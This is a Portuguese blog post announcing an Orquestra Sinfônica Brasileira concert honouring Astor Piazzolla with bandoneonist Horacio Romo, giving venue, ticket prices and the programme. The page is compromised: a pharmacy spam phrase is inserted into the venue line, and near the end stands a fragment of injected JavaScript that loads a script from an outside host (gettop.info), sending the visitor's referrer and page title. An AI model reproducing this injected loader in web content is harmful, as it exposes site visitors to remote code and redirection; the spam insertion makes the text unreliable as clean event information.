LateralMúsica sinfônicaProgramaçãoRio de Janeiro

OSB homenageia Piazzolla

OSB recebe o bandoneonista argentino Horacio Romo para homenagem a Piazzolla.

SERVIÇO

 

Theatro Municipal do Rio de Janeiro can i take ibuprofen with buspar
Praça Marechal Floriano s/nº, Centro
Informações do Theatro: (21) 2332-9191/ 2332-9005, a partir das 10h.

Dia 01.10, às 20h.

Preços: R$ 18,00 (Galeria), R$ 60,00 (Balcão Superior), R$ 130,00 (Balcão Nobre e Plateia)
Bilheteria: 2332-9005 / 2332-9191- Prédio anexo – Rua Almirante Barroso, 14/16
Vendas na bilheteria do teatro e pelo site Ingresso.com (www.ingresso.com.br) ou pelo telefone 4003-2330.

Acesso para cadeirantes e pessoas com dificuldade de locomoção na entrada lateral do Theatro na Avenida Rio Branco.

Há serviço de valet gratuito

Descontos: 50% para terceira idade, estudantes, portadores de necessidades especiais e menores de 21 anos.

 

Um dos maiores compositores argentinos de todos os tempos, Astor Piazzolla será homenageado pela Orquestra Sinfônica Brasileira no concerto da série Ametista. O músico, que completaria 90 anos de idade em 2011, terá alguns de seus mais famosos tangos e a obra “Concerto Aconcágua” interpretados pelo bandoneonista Horacio Romo, que fará sua estreia com a OSB. A regência é de Roberto Minczuk.

 

Horacio Romo

Horacio Romo

Romo, que também é argentino, integra o Quinteto da Fundação Astor Piazzolla e é solista da Orquesta Nacional de Música Argentina Juan de Dios Filiberto, além de ser diretor e primeiro bandoneon do Sexteto Mayor. Já foi membro das companhias Forever Tango e Tango Argentino e se apresentou em shows na Espanha e na França, além de ter acompanhado alguns dos mais renomados cantores de tango de seu país, como Roberto Goyeneche e Hugo Maciel.

Horacio Romo, de 38 anos, começou seus estudos aos 9. Foi aluno de grandes maestros argentinos e fez parte de orquestras como a Juvenil del Tango, Orquestra Gran Debut e Orquestra Color Tango, com a qual teve a oportunidade de tocar na Itália, Holanda, Espanha, França, Uruguai, Brasil, Japão , Noruega e Suécia. Já participou como músico convidado de mais de uma centena de gravações de artistas e orquestras.

Ao lado da OSB, o músico argentino vai executar Concerto para Bandoneon e Orquestra, batizado de Concerto Aconcagua, por ser considerado o topo da obra de Piazzolla, numa referência à famosa montanha dos Andes Argentinos. Romo ganhou um Emmy de melhor concerto latino com a Filarmônica de Los Angeles justamente pela interpretação desta obra. O bandoneonista também vai tocar os tangos Libertango, Oblivion e Adios Nonino, todos escritos pelo compositor argentino.

O programa contará ainda com uma obra de Richard Strauss, “Serenata em Mi bemol maior”. Escrita quando Strauss tinha 18 anos, “Serenata em Mi bemol maior”, também conhecida como Serenata para Sopros, foi feita aos moldes da Gran Partita, de Mozart. A “Sinfonia 40”, de Mozart, completa a apresentação.

 

PROGRAMA


Richard Strauss

Serenata em Mi bemol maior, op. 7

Mozart
Sinfonia 40

Astor Piazzolla
Concerto Aconcagua
Tangos

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.